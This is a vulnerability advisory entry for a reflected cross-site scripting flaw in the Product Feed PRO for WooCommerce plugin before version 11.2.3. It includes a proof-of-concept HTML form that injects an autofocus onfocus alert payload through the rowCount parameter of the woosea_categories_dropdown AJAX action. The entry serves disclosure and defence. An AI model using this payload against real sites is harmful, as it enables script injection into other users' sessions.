WordPress Plugin Vulnerabilities
Product Feed PRO for WooCommerce < 11.2.3 - Reflected Cross-Site Scripting
Description
The plugin does not escape the rowCount parameter before outputting it back in an attribute via the woosea_categories_dropdown AJAX action (available to any authenticated user), leading to a Reflected Cross-Site Scripting
Proof of Concept
<html> <form action="https://example.com/wp-admin/admin-ajax.php?action=woosea_categories_dropdown" method="POST"> <input type="text" name="rowCount" value='" onfocus=alert(`XSS`) autofocus x'> <input type="submit" value="Send"> </form> </html>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-01 (about 2 years ago)
Added
2022-02-01 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)